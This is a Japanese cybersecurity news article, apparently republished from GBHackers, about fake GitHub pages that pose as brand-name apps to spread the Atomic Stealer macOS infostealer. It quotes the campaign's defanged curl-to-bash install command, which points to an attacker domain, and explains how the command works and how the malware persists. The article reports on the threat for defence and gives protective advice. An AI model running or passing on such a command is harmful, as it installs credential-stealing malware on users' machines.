サイバーニュース.jp

世界のサイバーなニュースを配信

武器化されたマルウェア:GitHubがMalwarebytes、LastPass、Citibank、SentinelOneなどのマルウェアをホスト

カテゴリ:

, , , , , , , , ,

Macユーザーを標的とした大規模なキャンペーンが展開されており、偽のGitHubページを利用して、人気のある正規アプリケーションを装った情報窃取型マルウェアを配布しています。偽装されたソフトウェアの中には、Malwarebytes for Mac、LastPass、Citibank、SentinelOneなど、多数の有名ブランドが含まれています。

ブランドのなりすましは新しい手口ではありませんが、このキャンペーンは、サイバー犯罪者がユーザーを騙して有害なコードを自らインストールさせるための戦術が進化していることを示しています。

LastPass Threat IntelligenceとMalwarebytesの脅威研究者は、信頼できるアプリケーションのmacOSインストーラーをホストしていると称する多数のGitHubページを特定しました。いくつかのケースでは、攻撃者はスポンサー付きのGoogle広告を購入し、ユーザーを正規ベンダーのサイトではなく、これらの悪意のあるページに誘導しています。また、SEOポイズニング技術を利用して、「Malwarebytes GitHub macOS」のような検索クエリで偽のリポジトリを検索結果の上位に表示させています。一度サイトに誘導されると、不注意なユーザーは「[アプリケーション名]を入手」ボタンを提示されます。これをクリックすると、新しく登録されたドメインからインストーラースクリプトをダウンロードして実行する指示が表示され、多くの場合、ユーザーのプロンプトやコードレビューなしに実行され、macOSの保護機能やユーザーの警戒を効果的に回避します。

この操作の目的は、ブラウザデータ、クリップボードの内容、保存された認証情報を収集する強力なmacOS情報窃取型マルウェアであるAtomic Stealer(AMOSとしても知られる)をデプロイすることです。もし誰かがそのボタンをクリックすると、偽の製品(実際には情報窃取型マルウェア)をインストールする方法が記載されたダウンロードページにたどり着きます。Malwarebytes for MacとThreatDownの両方がこの亜種を検出しブロックしますが、最初のソーシャルエンジニアリングは、注意力の低いユーザーに対して驚くほど効果的です。

### 感染経路の技術的分析

インストールプロセスは、ユーザーがmacOSターミナルにコピー&ペーストするよう指示される単一行のシェルコマンドに完全に依存しています。

“`bash
bash /bin/bash -c “$(curl -fsSL https://gosreestr[.]com/hun/install.sh)”
“`

これは次のように機能します。

* `curl -fsSL`オプションは、リダイレクトに従い、HTTPエラー時に静かに失敗しながら、リモートスクリプトをサイレントにダウンロードします。
* `curl`の呼び出しを`$(…)`で囲むことで、ダウンロードされたスクリプトが直接外側の`bash -c`コマンドに渡されます。
* 外側のシェル呼び出しは、ユーザーに内容を提示することなく、フェッチされたスクリプトを即座に実行します。

攻撃者は、中間URLをBase64でエンコードして真の宛先を難読化し、カジュアルな観察者による検出をより困難にしています。ターミナルアプローチは、macOSの組み込みアプリケーション署名チェックをトリガーせず、管理者レベルのプロンプトも必要としないため、スクリプトはユーザーの権限で実行され、`LaunchAgents`または`LaunchDaemons`に永続的なエージェントをインストールできます。

### 偽ソフトウェアを回避するためのベストプラクティス

この手口や同様の戦術から身を守るために、Macユーザーは以下のガイドラインを採用すべきです。

* 未検証のウェブページ、フォーラム、GitHubリポジトリからコピー&ペーストされたコマンドは絶対に実行しないでください。`curl … | bash`または同様の構造を呼び出すコマンドは、高リスクとして扱うべきです。
* アプリケーションは常に開発者の公式ウェブサイトまたは信頼できるアプリストアからダウンロードしてください。疑わしい場合は、ベンダーのサポートチャネルを通じて直接ダウンロードURLを確認してください。
* スポンサー付きの検索結果には注意を払い、無効にするか慎重に利用してください。これらの広告は、信頼できるブランドを装った悪意のあるページにリダイレクトする可能性があります。
* ウェブフィルタリングを含むリアルタイムのアンチマルウェア保護を導入してください。Malwarebytes for MacやThreatDownのようなソリューションは、インストール前にAtomic Stealerの亜種を検出してブロックします。
* 感染が疑われる場合は、`~/Library/LaunchAgents`および`/Library/LaunchDaemons`フォルダに見慣れない項目がないか検査し、疑わしいエントリを削除してください。
* 包括的な修復のためには、macOSの完全な再インストールを検討し、既知のクリーンなバックアップからのみファイルを復元してください。盗まれた認証情報による不正アクセスを防ぐために、すべてのアカウントパスワードを再初期化し、多要素認証を有効にしてください。

GitHubは一般的にオープンソースソフトウェアの信頼できるプラットフォームですが、このキャンペーンは、敵対者が正規ブランドになりすますことで、いかにGitHubを武器化できるかを示しています。警戒心、慎重なダウンロード習慣、そして堅牢なエンドポイント保護が、このような急速に進化する脅威に対する最善の防御策であり続けます。

元記事:[https://gbhackers.com/weaponized-malware-github-hosts-malware-from-malwarebytes-lastpass-citibank-sentinelone-and-more/](https://gbhackers.com/weaponized-malware-github-hosts-malware-from-malwarebytes-lastpass-citibank-sentinelone-and-more/)

投稿をさらに読み込む